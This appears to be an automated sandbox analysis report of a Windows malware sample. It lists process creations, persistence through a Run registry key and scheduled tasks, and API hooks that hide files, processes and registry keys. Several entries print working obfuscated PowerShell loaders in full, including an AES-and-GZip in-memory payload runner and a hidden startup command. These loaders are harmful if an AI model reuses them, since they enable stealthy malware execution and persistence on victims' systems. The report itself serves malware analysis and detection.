Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Suspicious command line found
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413901E3C LoadLibraryA,GetProcAddress,SleepEx,
Source: C:\Windows\System32\cmd.exeCode function: 19_3_00000224138EA7DD push rcx; retf 003Fh
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000002BCD7E1A7DD push rcx; retf 003Fh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8B23FB pushad ; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98BFFE push eax; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98B7F8 push eax; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C829 push ds; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98BF5F push eax; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C749 push ds; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98BE69 push eax; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98CA5F push ds; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98BD89 push eax; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C9BE push ds; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C1DA push ds; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C1A0 push eax; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C91F push ds; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C09F push eax; retf
Source: C:\Windows\System32\conhost.exeCode function: 37_3_0000026504E8A7DD push rcx; retf 003Fh
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000025DC1AAA7DD push rcx; retf 003Fh
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_00000225DC62A7DD push rcx; retf 003Fh
Source: C:\Windows\System32\lsass.exeCode function: 40_3_00000202C0ACA7DD push rcx; retf 003Fh
Source: C:\Windows\System32\svchost.exeCode function: 41_3_000002A6612EA7DD push rcx; retf 003Fh
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAEDCA7DD push rcx; retf 003Fh
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAED9A7DD push rcx; retf 003Fh
Source: C:\Windows\System32\svchost.exeCode function: 43_3_0000026A879AA7DD push rcx; retf 003Fh
Source: C:\Windows\System32\svchost.exeCode function: 44_3_000001795378A7DD push rcx; retf 003Fh
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_3_0000016CE5E3A7DD push rcx; retf 003Fh
Source: C:\Windows\System32\svchost.exeCode function: 46_3_000002295D54A7DD push rcx; retf 003Fh

Boot Survival

barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious names
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-QgS1M4PT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
